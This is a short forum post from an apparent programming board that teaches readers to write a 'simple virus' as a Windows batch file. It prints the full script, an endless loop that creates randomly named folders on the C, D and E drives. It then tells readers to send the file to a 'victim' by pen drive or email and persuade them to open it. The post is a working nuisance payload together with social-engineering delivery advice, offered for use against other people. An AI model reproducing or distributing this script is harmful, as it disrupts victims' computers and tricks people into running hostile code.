Afriwap.com
Computer / Technology / Mobile Internet => Computer / Technology => Programming => Topic started by: Timi Dapsin on December 13, 2013, 03:01:26 PM
-
(http://www.instructables.com/files/deriv/FN1/OXLJ/HHYLVR4P/FN1OXLJHHYLVR4P.LARGE.jpg)
Here we are going to show, How to make Simple Virus in notepad.
Like our Facebook Page : http://www.facebook.com/errorcode401
Step 1 : We will Create a Virus
Step 2 : We will Check it on Victims Computer.
[ Note : Don't try it on your computer ]
Step 1: Open Notepad and Copy the Following code in Notepad.
(http://www.instructables.com/files/deriv/FKU/S1N2/HHTE118O/FKUS1N2HHTE118O.LARGE.jpg)
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in
Step 2: Give it to Victim
(http://www.instructables.com/files/deriv/F05/0HRG/HHS9EEHL/F050HRGHHS9EEHL.LARGE.jpg)
Now Give this file to Victim via Pen-drive or Mail then ask to Open it.
It will Create More Folder in C,D,and E drive.